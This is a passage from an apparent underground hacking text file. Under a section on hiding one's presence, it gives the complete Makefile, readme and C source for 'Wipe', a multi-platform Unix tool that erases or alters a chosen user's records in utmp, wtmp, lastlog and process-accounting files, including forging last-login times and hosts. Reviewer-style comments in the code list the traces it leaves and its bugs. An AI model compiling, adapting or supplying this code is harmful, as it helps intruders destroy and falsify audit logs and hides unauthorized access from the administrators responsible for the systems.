[-l preload]\n\t[-p pattern] [-s packetsize] [-t ttl] [-I interface address] host\n"); exit(1); } If you need more, start coding...... :) -- || Hiding your presence under lots of OS... -- ---------------------------------------- Allrite, now you want not to be seen in the logs...Then you can do the following: edit the logs manually (sheesh, only if you are desperate), or use a program to do it for you (that's for normal people)... 
Anyways, the BIG problem is finding a program to work for a multitude of Operating Systems... now, there are lots of programs that claim that they can do it, but i've seen only one program, really and that's WIPE ... -------------------------------Makefile--------------------------------------- # # This is the Makefile for wipe. # CC=gcc CFLAGS = -O3 default: @echo @echo Wipe v0.01 ! @echo @echo "Usage: 'make ' where System types are:" @echo @echo " linux freebsd sunos4 solaris2 ultrix" @echo " aix irix digital bsdi netbsd hpux" @echo # # Linux : Tested on various 1.2.x, 1.3.x and pre 2.0 systems. # Accounting seems to be still in development. # linux: wipe.c $(CC) $(CFLAGS) -DHAVE_LASTLOG_H -DNO_ACCT -o wipe wipe.c # # FreeBSD : Tested on 2.1.0. Accounting file is at /var/account/acct. # freebsd: wipe.c $(CC) $(CFLAGS) -DACCT_FILE=\"/var/account/acct\" -o wipe wipe.c # # SunOS 4.1.x : Standard BSD type setup. # sunos4: wipe.c $(CC) $(CFLAGS) -DHAVE_LASTLOG_H -o wipe wipe.c # # Solaris 2.x : Ugh, System V. Has UTMPX. # solaris2: wipe.c $(CC) $(CFLAGS) -DHAVE_LASTLOG_H -DHAVE_UTMPX -o wipe wipe.c # # Ultrix : # ultrix: wipe.c $(CC) $(CFLAGS) -DHAVE_LASTLOG_H -o wipe wipe.c # # AIX : # aix: wipe.c $(CC) $(CFLAGS) -o wipe wipe.c # # IRIX : # irix: wipe.c $(CC) $(CFLAGS) -DHAVE_LASTLOG_H -DHAVE_UTMPX -o wipe wipe.c # # Digital/OSF : # digital: wipe.c $(CC) $(CFLAGS) -DHAVE_LASTLOG_H -o wipe wipe.c # # BSDI : # bsdi: wipe.c $(CC) $(CFLAGS) -o wipe wipe.c # # NetBSD : # netbsd: wipe.c $(CC) $(CFLAGS) -o wipe wipe.c # # HP-UX : # hpux: wipe.c $(CC) $(CFLAGS) -o wipe wipe.c clean: rm -f wipe ------------------------------HOWTO----------------------------------------- Wipe v1.00 ========== Type 'make' to view the possible system variants. Then type 'make [systype]' to compile for your system. -------------------------------readme-------------------------------------- Wipe v1.00 =========== Wipe is an all-in-one UNIX log wiper. 
Wipe removes log entries from UTMP, WTMP, LASTLOG and ACCT entries. It will compile on virtually anything and wipe the logs CORRECTLY for that variant of UNIX. Something that always fucks me, is having different versions of code for different variants of UNIX systems. Wipe solves this problem due to it's wide portability across many platforms. Wipe is simple to use, after compiling just type 'wipe' for info. The Crawler. -------------------------------wipe.c-------------------------------------- /* * Wipe v1.00. * * Written by The Crawler. * * Selectively wipe system logs. * * Wipes logs on, but not including, Linux, FreeBSD, Sunos 4.x, Solaris 2.x, * Ultrix, AIX, IRIX, Digital UNIX, BSDI, NetBSD, HP/UX. */ #include #include #include #ifndef NO_ACCT #include #endif #include #include #include #include #include #include #include #include #include #ifdef HAVE_LASTLOG_H #include #endif #ifdef HAVE_UTMPX #include #endif /* * Try to use the paths out of the include files. * But if we can't find any, revert to the defaults. */ #ifndef UTMP_FILE #ifdef _PATH_UTMP #define UTMP_FILE _PATH_UTMP #else #define UTMP_FILE "/var/adm/utmp" #endif #endif #ifndef WTMP_FILE #ifdef _PATH_WTMP #define WTMP_FILE _PATH_WTMP #else #define WTMP_FILE "/var/adm/wtmp" #endif #endif #ifndef LASTLOG_FILE #ifdef _PATH_LASTLOG #define LASTLOG_FILE _PATH_LASTLOG #else #define LASTLOG_FILE "/var/adm/lastlog" #endif #endif #ifndef ACCT_FILE #define ACCT_FILE "/var/adm/pacct" #endif #ifdef HAVE_UTMPX #ifndef UTMPX_FILE #define UTMPX_FILE "/var/adm/utmpx" #endif #ifndef WTMPX_FILE #define WTMPX_FILE "/var/adm/wtmpx" #endif #endif /* HAVE_UTMPX */ #define BUFFSIZE 8192 /* * This function will copy the src file to the dst file. 
*/
/*
 * Each wipe_* function below edits one login-accounting file in place.
 * The inline notes record what each edit leaves behind (zeroed records,
 * changed file sizes and timestamps, stray temporary files); those are
 * the inconsistencies a reviewer checking these files for tampering
 * would look for.
 */
void copy_file(char *src, char *dst)
{
    int fd1, fd2;
    int n;
    char buf[BUFFSIZE];

    if ( (fd1 = open(src, O_RDONLY)) < 0 ) {
        fprintf(stderr, "ERROR: Opening %s during copy.\n", src);
        return;
    }
    /*
     * O_CREAT is passed without a mode argument, so if dst does not already
     * exist its permission bits are whatever open() reads for the missing
     * argument.  The only caller in this file (wipe_acct) passes ACCT_FILE,
     * which it has already opened for reading, so in practice O_TRUNC
     * applies and the existing mode is kept.  fd1 is not closed on this
     * error return.
     */
    if ( (fd2 = open(dst, O_WRONLY | O_CREAT | O_TRUNC)) < 0 ) {
        fprintf(stderr, "ERROR: Creating %s during copy.\n", dst);
        return;
    }
    /* A short write is treated as an error; neither fd is closed on the error returns. */
    while ( (n = read(fd1, buf, BUFFSIZE)) > 0)
        if (write(fd2, buf, n) != n) {
            fprintf(stderr, "ERROR: Write error during copy.\n");
            return;
        }
    if (n < 0) {
        fprintf(stderr, "ERROR: Read error during copy.\n");
        return;
    }
    close(fd1);
    close(fd2);
}

/*
 * UTMP editing.
 *
 * Zeroes every utmp record whose ut_name begins with `who` and, when
 * `line` is non-NULL, whose ut_line begins with `line`.  Records are
 * overwritten in place rather than removed, so the file keeps its size:
 * an all-zero slot in utmp is the artifact this leaves.  Both compares
 * are prefix matches over strlen() of the argument, so "bob" also
 * matches "bobby" and "tty1" also matches "tty10".
 */
void wipe_utmp(char *who, char *line)
{
    int fd1;
    struct utmp ut;

    printf("Patching %s .... ", UTMP_FILE);
    fflush(stdout);
    /*
     * Open the utmp file.
     */
    if ( (fd1 = open(UTMP_FILE, O_RDWR)) < 0 ) {
        fprintf(stderr, "ERROR: Opening %s\n", UTMP_FILE);
        return;
    }
    /*
     * Walk the file record by record, zeroing the matching ones in place.
     */
    while ( read(fd1, &ut, sizeof(ut)) > 0)
        if ( !strncmp(ut.ut_name, who, strlen(who)) )
            if (!line || (line && !strncmp(ut.ut_line, line, strlen(line)))) {
                bzero((char *) &ut, sizeof(ut));
                /* Step back over the record just read and overwrite it with zeros. */
                lseek(fd1, (int) -sizeof(ut), SEEK_CUR);
                write(fd1, &ut, sizeof(ut));
            }
    close(fd1);
    printf("Done.\n");
}

/*
 * UTMPX editing if supported.
 *
 * Same procedure as wipe_utmp, applied to the System V utmpx file.
 */
#ifdef HAVE_UTMPX
void wipe_utmpx(char *who, char *line)
{
    int fd1;
    struct utmpx utx;

    printf("Patching %s .... ", UTMPX_FILE);
    fflush(stdout);
    /*
     * Open the utmpx file; it is edited in place, no temporary file is used.
     */
    if ( (fd1 = open(UTMPX_FILE, O_RDWR)) < 0 ) {
        fprintf(stderr, "ERROR: Opening %s\n", UTMPX_FILE);
        return;
    }
    while ( (read(fd1, &utx, sizeof(utx)) ) > 0)
        if ( !strncmp(utx.ut_name, who, strlen(who)) )
            if (!line || (line && !strncmp(utx.ut_line, line, strlen(line)))) {
                bzero((char *) &utx, sizeof(utx));
                /* Step back over the record just read and overwrite it with zeros. */
                lseek(fd1, (int) -sizeof(utx), SEEK_CUR);
                write(fd1, &utx, sizeof(utx));
            }
    close(fd1);
    printf("Done.\n");
}
#endif

/*
 * WTMP editing.
 *
 * Scans wtmp backwards from the last record and zeroes only the most
 * recent record matching who/line, then stops.  Earlier sessions for the
 * same user stay in the file, and the file length is unchanged; a zeroed
 * record near the end of wtmp is the artifact.
 */
void wipe_wtmp(char *who, char *line)
{
    int fd1;
    struct utmp ut;

    printf("Patching %s .... ", WTMP_FILE);
    fflush(stdout);
    /*
     * Open the wtmp file; it is edited in place, no temporary file is used.
     */
    if ( (fd1 = open(WTMP_FILE, O_RDWR)) < 0 ) {
        fprintf(stderr, "ERROR: Opening %s\n", WTMP_FILE);
        return;
    }
    /*
     * Position on the last record, then read backwards one record at a
     * time until a match is found.
     */
    lseek(fd1, (long) -(sizeof(ut)), SEEK_END);
    while ( (read (fd1, &ut, sizeof(ut))) > 0) {
        if (!strncmp(ut.ut_name, who, strlen(who)))
            if (!line || (line && !strncmp(ut.ut_line, line, strlen(line)))) {
                bzero((char *) &ut, sizeof(ut));
                lseek(fd1, (long) -(sizeof(ut)), SEEK_CUR);
                write(fd1, &ut, sizeof(ut));
                break;
            }
        /*
         * After a non-matching read the position is just past that record;
         * step back two records to land on the previous one.
         * NOTE(review): when no record matches, this seek eventually goes
         * before offset 0 and fails, leaving the position unchanged, so
         * the loop appears not to terminate — not verified on a live file.
         */
        lseek(fd1, (long) -(sizeof(ut) * 2), SEEK_CUR);
    }
    close(fd1);
    printf("Done.\n");
}

/*
 * WTMPX editing if supported.
 *
 * Same procedure as wipe_wtmp, applied to the System V wtmpx file.
 */
#ifdef HAVE_UTMPX
void wipe_wtmpx(char *who, char *line)
{
    int fd1;
    struct utmpx utx;

    printf("Patching %s .... ", WTMPX_FILE);
    fflush(stdout);
    /*
     * Open the wtmpx file; it is edited in place, no temporary file is used.
     */
    if ( (fd1 = open(WTMPX_FILE, O_RDWR)) < 0 ) {
        fprintf(stderr, "ERROR: Opening %s\n", WTMPX_FILE);
        return;
    }
    /*
     * Position on the last record, then read backwards until a match.
     */
    lseek(fd1, (long) -(sizeof(utx)), SEEK_END);
    while ( (read (fd1, &utx, sizeof(utx))) > 0) {
        if (!strncmp(utx.ut_name, who, strlen(who)))
            if (!line || (line && !strncmp(utx.ut_line, line, strlen(line)))) {
                bzero((char *) &utx, sizeof(utx));
                lseek(fd1, (long) -(sizeof(utx)), SEEK_CUR);
                write(fd1, &utx, sizeof(utx));
                break;
            }
        /* Same backward step as wipe_wtmp (note the (int) cast here vs. (long) above). */
        lseek(fd1, (int) -(sizeof(utx) * 2), SEEK_CUR);
    }
    close(fd1);
    printf("Done.\n");
}
#endif

/*
 * LASTLOG editing.
 *
 * lastlog is indexed by uid (record N belongs to uid N), so the user's
 * slot is located with a seek rather than a scan.  The slot is always
 * rebuilt from an all-zero record: with no optional arguments the user's
 * last-login entry is blanked entirely; with line/timestr/host those
 * fields are filled with the supplied values.  A blank lastlog for an
 * account that has other traces of activity, or a lastlog time/host that
 * disagrees with wtmp, is the inconsistency this produces.
 */
void wipe_lastlog(char *who, char *line, char *timestr, char *host)
{
    int fd1;
    struct lastlog ll;
    struct passwd *pwd;
    struct tm *tm;
    char str[4];

    printf("Patching %s .... ", LASTLOG_FILE);
    fflush(stdout);
    /*
     * The malloc result is unchecked and never freed, and malloc does not
     * zero memory: fields never assigned below (tm_isdst in particular)
     * hold whatever was in the block when mktime() runs.
     */
    tm = (struct tm *) malloc( sizeof(struct tm) );
    /*
     * Open the lastlog file.
     */
    if ( (fd1 = open(LASTLOG_FILE, O_RDWR)) < 0 ) {
        fprintf(stderr, "ERROR: Opening %s\n", LASTLOG_FILE);
        return;
    }
    if ( (pwd = getpwnam(who)) == NULL) {
        fprintf(stderr, "ERROR: Can't find user in passwd.\n");
        return;
    }
    /* Seek to the user's slot; the final 0 is SEEK_SET. */
    lseek(fd1, (long) pwd->pw_uid * sizeof(struct lastlog), 0);
    bzero((char *) &ll, sizeof(ll));
    /*
     * The copy is bounded by the source length, not sizeof(ll.ll_line),
     * so a long `line` argument writes past the field (contrast the
     * ll_host copy below, which is bounded by the destination size).
     */
    if (line)
        strncpy(ll.ll_line, line, strlen(line));
    if (timestr) {
        /* YYMMddhhmm */
        if (strlen(timestr) != 10) {
            fprintf(stderr, "ERROR: Time format is YYMMddhhmm.\n");
            return;
        }
        /*
         * Extract Times.  Each pair of digits is copied into a
         * NUL-terminated 2-char buffer and converted with atoi().
         * tm_year counts years since 1900, so the two-digit YY is used
         * as-is ("97" -> 1997, "05" -> 1905).
         */
        str[2] = 0;
        str[0] = timestr[0]; str[1] = timestr[1];
        tm->tm_year = atoi(str);
        str[0] = timestr[2]; str[1] = timestr[3];
        tm->tm_mon = atoi(str) - 1;
        str[0] = timestr[4]; str[1] = timestr[5];
        tm->tm_mday = atoi(str);
        str[0] = timestr[6]; str[1] = timestr[7];
        tm->tm_hour = atoi(str);
        str[0] = timestr[8]; str[1] = timestr[9];
        tm->tm_min = atoi(str);
        tm->tm_sec = 0;
        /* NOTE(review): tm_isdst is uninitialized here, so the resulting time may be shifted by DST handling. */
        ll.ll_time = mktime(tm);
    }
    if (host)
        strncpy(ll.ll_host, host, sizeof(ll.ll_host));
    /* The write return value is not checked. */
    write(fd1, (char *) &ll, sizeof(ll));
    close(fd1);
    printf("Done.\n");
}

#ifndef NO_ACCT
/*
 * ACCOUNT editing.
 *
 * Unlike the utmp/wtmp functions, matching process-accounting records
 * are dropped rather than zeroed: every record is copied to a temporary
 * file except those whose uid and tty device number match, and the copy
 * is then written back over ACCT_FILE.  The file therefore shrinks and
 * is rewritten in full, which changes its size and (presumably) its
 * modification time.
 */
void wipe_acct(char *who, char *line)
{
    int fd1, fd2;
    struct acct ac;
    char ttyn[50];
    struct passwd *pwd;
    struct stat sbuf;
    char *tmpf;

    printf("Patching %s .... ", ACCT_FILE);
    fflush(stdout);
    /*
     * Open the acct file and temporary file.
     */
    if ( (fd1 = open(ACCT_FILE, O_RDONLY)) < 0 ) {
        fprintf(stderr, "ERROR: Opening %s\n", ACCT_FILE);
        return;
    }
    /*
     * Grab a unique temporary filename.  tmpnam() only picks a name; the
     * file is created by the open() below, so the name is predictable and
     * the create is racy.  The mode is written as decimal 600 (octal
     * 01130), not 0600, so the temporary file carries unusual permission
     * bits.  The error returns below do not unlink it, so a failed run can
     * leave it behind in the system temp directory.
     */
    tmpf = tmpnam((char *) NULL);
    if ( (fd2 = open(tmpf, O_WRONLY | O_CREAT | O_TRUNC, 600)) < 0 ) {
        fprintf(stderr, "ERROR: Opening tmp ACCT file\n");
        return;
    }
    if ( (pwd = getpwnam(who)) == NULL) {
        fprintf(stderr, "ERROR: Can't find user in passwd.\n");
        return;
    }
    /*
     * Determine tty's device number.  ttyn is 50 bytes and `line` comes
     * straight from argv with no length check.
     */
    strcpy(ttyn, "/dev/");
    strcat(ttyn, line);
    if (stat(ttyn, &sbuf) < 0) {
        fprintf(stderr, "ERROR: Determining tty device number.\n");
        return;
    }
    /* Copy every record except those for this uid on this tty device. */
    while ( read(fd1, &ac, sizeof(ac)) > 0 ) {
        if ( !(ac.ac_uid == pwd->pw_uid && ac.ac_tty == sbuf.st_rdev) )
            write(fd2, &ac, sizeof(ac));
    }
    close(fd1);
    close(fd2);
    copy_file(tmpf, ACCT_FILE);
    /* The message says WTMP but the file being removed is the ACCT temp file. */
    if ( unlink(tmpf) < 0 ) {
        fprintf(stderr, "ERROR: Unlinking tmp WTMP file.\n");
        return;
    }
    printf("Done.\n");
}
#endif

/*
 * Print the command summary and exit with status 1.  main() only checks
 * argument counts, never argument validity, before dispatching.
 */
void usage()
{
    printf("USAGE: wipe [ u|w|l|a ] ...options...\n");
    printf("\n");
    printf("UTMP editing:\n");
    printf(" Erase all usernames : wipe u [username]\n");
    printf(" Erase one username on tty: wipe u [username] [tty]\n");
    printf("\n");
    printf("WTMP editing:\n");
    printf(" Erase last entry for user : wipe w [username]\n");
    printf(" Erase last entry on tty : wipe w [username] [tty]\n");
    printf("\n");
    printf("LASTLOG editing:\n");
    printf(" Blank lastlog for user : wipe l [username]\n");
    printf(" Alter lastlog entry : wipe l [username] [tty] [time] [host]\n");
    printf(" Where [time] is in the format [YYMMddhhmm]\n");
    printf("\n");
#ifndef NO_ACCT
    printf("ACCT editing:\n");
    printf(" Erase acct entries on tty : wipe a [username] [tty]\n");
#endif
    exit(1);
}

/*
 * Entry point: wipe <u|w|l|a> <username> [tty] [time] [host].
 * Returns 0 in every case that does not go through usage().
 */
int main(int argc, char *argv[])
{
    char c;

    if (argc < 3)
        usage();
    /*
     * First character of first argument determines which file to edit.
     */
    c = toupper(argv[1][0]);
    /*
     * Dispatch on that letter.  Each branch selects a call by exact argc,
     * so an argument count outside the listed forms does nothing; there is
     * no default case, so an unknown letter also does nothing and the
     * program still exits 0.
     */
    switch (c) {
    /* UTMP */
    case 'U' :
        if (argc == 3)
            wipe_utmp(argv[2], (char *) NULL);
        if (argc ==4)
            wipe_utmp(argv[2], argv[3]);
#ifdef HAVE_UTMPX
        if (argc == 3)
            wipe_utmpx(argv[2], (char *) NULL);
        if (argc == 4)
            wipe_utmpx(argv[2], argv[3]);
#endif
        break;
    /* WTMP */
    case 'W' :
        if (argc == 3)
            wipe_wtmp(argv[2], (char *) NULL);
        if (argc == 4)
            wipe_wtmp(argv[2], argv[3]);
#ifdef HAVE_UTMPX
        if (argc == 3)
            wipe_wtmpx(argv[2], (char *) NULL);
        if (argc == 4)
            wipe_wtmpx(argv[2], argv[3]);
#endif
        break;
    /* LASTLOG */
    case 'L' :
        if (argc == 3)
            wipe_lastlog(argv[2], (char *) NULL, (char *) NULL, (char *) NULL);
        if (argc == 4)
            wipe_lastlog(argv[2], argv[3], (char *) NULL, (char *) NULL);
        if (argc == 5)
            wipe_lastlog(argv[2], argv[3], argv[4], (char *) NULL);
        if (argc == 6)
            wipe_lastlog(argv[2], argv[3], argv[4], argv[5]);
        break;
#ifndef NO_ACCT
    /* ACCT */
    case 'A' :
        if (argc != 4)
            usage();
        wipe_acct(argv[2], argv[3]);
        break;
#endif
    }
    return(0);
}